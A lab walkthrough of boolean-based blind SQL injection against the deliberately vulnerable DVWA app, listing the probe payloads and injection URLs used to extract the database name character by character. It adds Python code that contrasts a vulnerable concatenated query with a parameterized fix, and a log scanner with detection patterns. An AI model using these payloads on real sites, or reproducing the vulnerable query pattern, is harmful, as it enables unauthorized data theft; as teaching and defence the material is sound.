POC On Boolean-Based Blind SQLi
Introduction:-
In this POC I will walk through a small demonstration of a Boolean-based blind SQL injection vulnerability, using basic SQL queries against a deliberately vulnerable web application, DVWA. You will get an idea of how a website vulnerable to boolean-based injection is affected, and how the data in its database can be read, stolen and manipulated through this flaw. Here I will show how to recover the database name; the same method, with different queries chosen according to your need, gets at whatever data you are after.
About Boolean-Based Blind SQLi:-
If you look at the name, the two words "Boolean" and "Blind" already explain the attack. "Boolean" means it relies on boolean values, i.e. true or false. "Blind" means the injection is blind: the page shows no error and no query output, only whether the injected condition evaluated to true or false. The only way to extract data is to brute-force it, in other words to guess one query at a time, which is why this attack is very time consuming.
Lab Environment:-
Vulnerable web application:-DVWA
Web server:-xampp
Demonstration:-
Step 1:-
First we have to set up the environment. I downloaded DVWA (the vulnerable web application) and a server (XAMPP) on which to host it. After installing XAMPP there is an xampp folder on the C: drive; inside it is the htdocs folder, and all of the DVWA files have to be copied into htdocs.
Step 2:-
Open the XAMPP control panel and start Apache and MySQL.
Step 3:-
To open DVWA, go to the browser and type "127.0.0.1/DVWA-master". That brings up the login screen; after entering the username (admin) and password (password) you reach the homepage. Set the security level to low, and once the setup is complete we can go ahead and perform the attack.
Step 4:-
We find out whether the page uses the GET method by entering some data into the text field or search box of the website and watching the URL.
After entering 1, the URL contains id=1 and the result is "User ID exists in the database". This means the website passes the parameter by GET and uses it to query the database.
Step 5:-
Now we will check whether the website (DVWA) is vulnerable. For this attack we use the conditions given below:
- AND 1=1
- AND 1=0, AND 0=1
- OR 1=1
- OR 1=0, OR 0=1
Note:- having and div can be used in place of AND and OR.
You can try any one of them on the website to check for the vulnerability. Here I used AND 1=1 (it checks whether 1 is equal to 1; since 1 is equal to 1, the database answers true).
Note:- I write ' before the query and --+ after it. -- is a comment marker: the server reads only what lies between the ' and the comment (--), and everything after the -- is ignored. The + becomes a space once the URL is decoded, and MySQL requires that space after -- for the comment to take effect.
After that I got no error: the page accepted my query and again returned "User ID exists in the database". That tells me the injection is blind, and by using true and false conditions we can go on to retrieve database information. (Different queries can produce different errors or no error at all; every website has its own indication, and you have to identify what a true and a false response look like for that site.) Since the website accepts my queries, it is vulnerable to this attack.
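The check in step 5 works because the id value is glued straight into the SQL text. Below is an added Python example, not code from the original write-up or from DVWA, that reproduces the boolean oracle against a constructed in-memory SQLite table using the page's own AND 1=1 / AND 1=0 probes, and then shows the parameterized version that the same probes cannot influence. The table contents, the function names and the "MISSING" message used for the false branch are my assumptions. SQLite stands in for MySQL so the snippet runs offline; both treat -- as a comment, and the + in --+ becomes a space when the URL is decoded.

```python
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    """Constructed in-memory stand-in for a users table (assumption: not DVWA's schema or data)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown")],
    )
    return con


def user_exists_vulnerable(con, user_id):
    """String concatenation: the submitted value becomes part of the SQL text,
    so a quote can close the literal and append a boolean condition."""
    sql = f"SELECT first_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchone() is not None


def user_exists_hardened(con, user_id):
    """Integer check plus a bound parameter: the value is data, never SQL."""
    if not user_id.isdigit():
        return False  # anything that is not a plain numeric id is rejected outright
    row = con.execute(
        "SELECT first_name FROM users WHERE user_id = ?", (int(user_id),)
    ).fetchone()
    return row is not None


# The id parameter exactly as the write-up's URLs carry it, before decoding:
# %27 is ', %3D is =, and both %20 and + are spaces, so "--+" becomes "-- ".
PROBE_TRUE = unquote_plus("1%27+AND+1%3D1--+")
PROBE_FALSE = unquote_plus("1%27+AND+1%3D0--+")


def oracle(con, check, user_id):
    """Mimic the page's fixed response text: one message for true, another for false
    (the false message is an assumed stand-in; the page only shows the true one)."""
    if check(con, user_id):
        return "User ID exists in the database"
    return "User ID is MISSING from the database"


if __name__ == "__main__":
    con = make_db()
    for label, check in (("vulnerable", user_exists_vulnerable),
                         ("hardened", user_exists_hardened)):
        for probe in ("1", PROBE_TRUE, PROBE_FALSE):
            print(f"{label:10} id={probe!r:18} -> {oracle(con, check, probe)}")
```

Run stand-alone, the vulnerable path answers "exists" for both a plain 1 and the AND 1=1 probe and "MISSING" for AND 1=0, which is exactly the two-state oracle the attack needs; the hardened path answers "exists" only for real ids, so the probes carry no information. Rejecting non-numeric ids is a belt-and-braces check; the bound parameter alone already prevents the value from altering the query.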
Step 6:-
Now we will retrieve the name of the database. First we should find out how many characters are in the database name; knowing the length makes the rest much easier, otherwise you would have to guess the name character by character without knowing when to stop. So we use AND (length(database()))=1 --+
http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/?id=1%27AND%20(length(database()))=1--+&Submit=Submit#
We start from 1 and keep increasing the number until we hit the length of the database name. How do we know when the query is correct? When we get the same result ("User ID exists in the database"), or no error of any kind, the guess is right.
At 4 we get the length:
http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/?id=1%27AND%20(length(database()))=4--+&Submit=Submit#
Now we have the length, i.e. there are 4 characters in the name of the database.
Step 7:-
In this attack all data is retrieved by its ASCII value, so the ASCII table below is used to map each code back to its character.
Now we will find the first character. For this we use
AND (ascii(substr((select database()),1,1)))>101--+
This query asks the database whether the ASCII value of the first character is greater than 101.
http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/?id=1'AND(ascii(substr((select database()),1,1))) > 101 --+&Submit=Submit#
But this query gave me the error (false) result, which means the first character is not greater than 101.
After trying the combinations of <, > and = I found that (ascii(substr((select database()),1,1)))=100--+ is the correct one; matching 100 against the ASCII table gives d (lowercase),
i.e.
http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/?id=1'AND(ascii(substr((select database()),1,1))) =100 --+&Submit=Submit#
Now we have the first character of the database's name.
Step 8:-
Using the same trial-and-error method for the remaining positions, I got the following results:
First character is d {AND (ascii(substr((select database()),1,1)))=100--+}
Second character is v {AND (ascii(substr((select database()),2,1)))=118--+}
Third character is w {AND (ascii(substr((select database()),3,1)))=119--+}
Fourth character is a {AND (ascii(substr((select database()),4,1)))=97--+}
So the name of the database is dvwa.
By following the above method you can extract data according to your need.
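Steps 6 to 8 cost one request per guess, and every one of them comes back HTTP 200 whether the condition was true or false, so the activity shows up in the request parameters of the web-server log rather than in status codes. The Python script below is an added example, not part of the original write-up, that scans constructed XAMPP/Apache access-log lines for the probe shapes used above (AND n=n tautologies, length(database()), ascii(substr(...)) and a trailing -- comment), lists each hit, and counts probes per client. The log lines, the indicator names and the alert threshold are my own assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Fields of an Apache/XAMPP access-log line that we need (assumed common log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators mirroring the probes in the write-up, matched against URL-decoded values.
INDICATORS = {
    "tautology": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "length_probe": re.compile(r"\blength\s*\(\s*database\s*\(\s*\)", re.I),
    "char_probe": re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
    "comment_tail": re.compile(r"--\s*$"),
}

# Constructed sample log: three probes from one client, benign traffic from both.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Mar/2024:12:00:01 +0000] "GET /DVWA-master/vulnerabilities/sqli_blind/'
    '?id=1&Submit=Submit HTTP/1.1" 200 4312',
    '127.0.0.1 - - [10/Mar/2024:12:00:05 +0000] "GET /DVWA-master/vulnerabilities/sqli_blind/'
    '?id=1%27+AND+1%3D1--+&Submit=Submit HTTP/1.1" 200 4312',
    '127.0.0.1 - - [10/Mar/2024:12:00:09 +0000] "GET /DVWA-master/vulnerabilities/sqli_blind/'
    '?id=1%27AND%20(length(database()))%3D4--+&Submit=Submit HTTP/1.1" 200 4312',
    '127.0.0.1 - - [10/Mar/2024:12:00:14 +0000] "GET /DVWA-master/vulnerabilities/sqli_blind/'
    '?id=1%27AND(ascii(substr((select+database()),1,1)))%3D100--+&Submit=Submit HTTP/1.1" 200 4312',
    '10.0.0.7 - - [10/Mar/2024:12:01:00 +0000] "GET /DVWA-master/vulnerabilities/sqli_blind/'
    '?id=2&Submit=Submit HTTP/1.1" 200 4290',
]


def classify_request(target):
    """Return the set of indicator names found in any query parameter of one request.
    parse_qsl decodes %xx escapes and turns + into a space, so "--+" is seen as "-- "."""
    hits = set()
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for name, pattern in INDICATORS.items():
            if pattern.search(value):
                hits.add(name)
    return hits


def scan_log(lines):
    """Return (ip, target, status, indicators) for every request carrying an indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these separately
        hits = classify_request(m["target"])
        if hits:
            findings.append((m["ip"], m["target"], m["status"], sorted(hits)))
    return findings


def probes_per_client(findings):
    """Count flagged requests per source address."""
    counts = {}
    for ip, *_ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


def flag_clients(findings, threshold=3):
    """Clients at or above the threshold; blind extraction needs many guesses per character,
    so a burst of probes from one address is the signal, not any single request."""
    return sorted(ip for ip, n in probes_per_client(findings).items() if n >= threshold)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, target, status, hits in found:
        print(f"{ip} {status} {','.join(hits):28} {target}")
    print("clients over threshold:", flag_clients(found))
```

Because every probe in a blind attack returns the same status and roughly the same page size, a status-based alert never fires; decoding the query string before matching is what makes the indicators visible, and the per-client count turns individual guesses into one incident. Matching on decoded parameters also catches the case where the browser has percent-encoded the quote and spaces, which is how these requests actually reach the server.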